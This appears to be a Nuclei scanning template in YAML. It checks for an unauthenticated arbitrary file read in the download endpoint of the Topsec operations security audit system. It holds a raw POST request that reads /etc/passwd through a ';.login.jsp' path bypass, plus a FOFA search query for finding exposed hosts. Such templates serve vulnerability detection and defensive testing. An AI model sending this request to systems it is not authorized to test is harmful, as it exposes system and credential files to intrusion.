http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - 'root:'
            - /bin/bash
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /iam/download;.login.jsp HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
          Content-Type: application/x-www-form-urlencoded

          filename=1.txt&filepath=/etc/passwd
id: topsec-download-File-reading
info:
    author: Superhero
    description: |-
        fofa: header="iam" && server="Apache-Coyote/"
        天融信运维安全审计系统 download 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。
    name: 天融信运维安全审计系统 download 任意文件读取漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247489143&idx=1&sn=54b9c3f0ef4b89cbe42d07695dce5154&chksm=c267a344f5102a523a77c864a3536fd8b1b24020f841d3ed4169c295244ef6de1034a451ac12&token=824558965&lang=zh_CN#rd
    severity: high
    tags:
        - File reading
        - 天融信运维安全审计系统
